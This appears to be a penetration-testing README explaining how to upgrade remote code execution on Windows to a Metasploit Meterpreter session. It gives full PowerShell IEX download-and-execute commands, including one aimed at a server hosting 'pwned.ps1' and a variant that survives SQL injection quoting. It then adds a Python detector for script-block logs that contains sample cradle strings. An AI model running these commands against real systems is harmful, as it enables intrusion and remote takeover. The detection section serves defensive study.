maudits/RCE-to-Meterpreter-via-Powershell

RCE to Meterpreter session via Powershell
================================================================================

If you have obtained RCE on a Windows machine and need to upgrade to a better
shell, this memo can help.

tl;dr: the Ruby script generates a PowerShell script which is downloaded and
executed in the target box's memory via the PowerShell IEX (Invoke-Expression) command.

It is recommended to run the Ruby script in Kali, as it uses Metasploit.
Originally this script was created to generate the same technique and payload
for the RubberDucky. The same script is now recycled for the same goal, but
delivered differently.

Steps:
- run the Ruby script in Kali and follow the steps
- open the created PowerShell script and copy the line from "powershell -nop" onwards
- save the copied text in a new PowerShell script (save it as .ps1)
- make the new .ps1 script available with SimpleHTTPServer or the like
- in Kali, start an exploit/multi/handler and use the same config defined in step 1
- on the target machine execute the following PowerShell command (define the IP and port)

    powershell IEX (New-Object Net.WebClient).DownloadString('http://server:port/pwned.ps1');

The IEX command is a bit picky and really wants single quotes around the URL. In the past I
had to inject the command via a SQL injection and I couldn't escape or reuse the
single quote. The hack that worked for me is the following command:

    powershell Set-Variable -Name "urlz" -Value "http://server:port/pwned.ps1" ;IEX (New-Object Net.WebClient).DownloadString($urlz);

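From the blue-team side, both commands above leave the same two halves in PowerShell script-block logging (Event ID 4104): a WebClient fetch and an in-memory IEX evaluation. The following detector is an added example, not code from this repository; it normalises PowerShell's typographic-quote variants (so the mixed-quote Set-Variable trick still matches) and runs over constructed sample log text.

```python
"""Flag the IEX download cradle from the memo above in PowerShell script-block
logs (Event ID 4104 ScriptBlockText). Added example, not code from the repo."""
import re

# PowerShell's lexer accepts typographic quotes as string delimiters, which is
# why the mixed-quote Set-Variable command above still runs; normalise them so
# a copy-pasted U+201C does not slip past a naive match.
SMART_QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"', "\u201e": '"',
                              "\u2018": "'", "\u2019": "'"})

INDICATORS = {
    # evaluate half: Invoke-Expression or its IEX alias
    "iex": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    # fetch half: WebClient.DownloadString (content lands in memory, not on disk)
    "webclient_download": re.compile(r"net\.webclient\b.*?\.downloadstring\s*\(", re.I | re.S),
    # launcher flag used by the generated script ("powershell -nop ...")
    "no_profile": re.compile(r"(^|\s)-nop\b", re.I),
    # URL parked in a variable to avoid quoting the literal inside IEX
    "url_via_variable": re.compile(r"set-variable\s+-name\s+\S+\s+-value\s+\"https?://", re.I),
}

def score_script_block(text: str) -> dict:
    """Return which indicators a script block matches, plus a combined verdict."""
    normalised = text.translate(SMART_QUOTES)
    hits = {name: bool(rx.search(normalised)) for name, rx in INDICATORS.items()}
    # A cradle needs both halves: remote fetch AND in-memory evaluation.
    # Fetch alone (e.g. saving a file) does not raise this verdict.
    hits["is_download_cradle"] = hits["iex"] and hits["webclient_download"]
    return hits

# Constructed sample script-block texts (not real telemetry): the first three
# mirror the memo's commands, the last two are benign controls.
SAMPLE_BLOCKS = [
    "IEX (New-Object Net.WebClient).DownloadString('http://server:port/pwned.ps1');",
    "Set-Variable -Name \"urlz\" -Value \u201chttp://server:port/pwned.ps1\" ;"
    "IEX (New-Object Net.WebClient).DownloadString($urlz);",
    "powershell -nop Invoke-Expression (New-Object Net.WebClient)"
    ".DownloadString('http://server:port/pwned.ps1')",
    "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }",
    "(New-Object Net.WebClient).DownloadString('http://example.invalid/notes.txt')"
    " | Out-File notes.txt",
]

def triage(blocks) -> list:
    """Indices of script blocks to escalate as download cradles."""
    return [i for i, b in enumerate(blocks) if score_script_block(b)["is_download_cradle"]]

if __name__ == "__main__":
    for i in triage(SAMPLE_BLOCKS):
        print(f"block {i}: cradle indicators {score_script_block(SAMPLE_BLOCKS[i])}")
```

Script-block logging must be enabled (Turn on PowerShell Script Block Logging) for 4104 events to exist; without it the download happens entirely in memory and leaves no file for disk-based tooling to inspect.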
Good luck and Have Fun!!!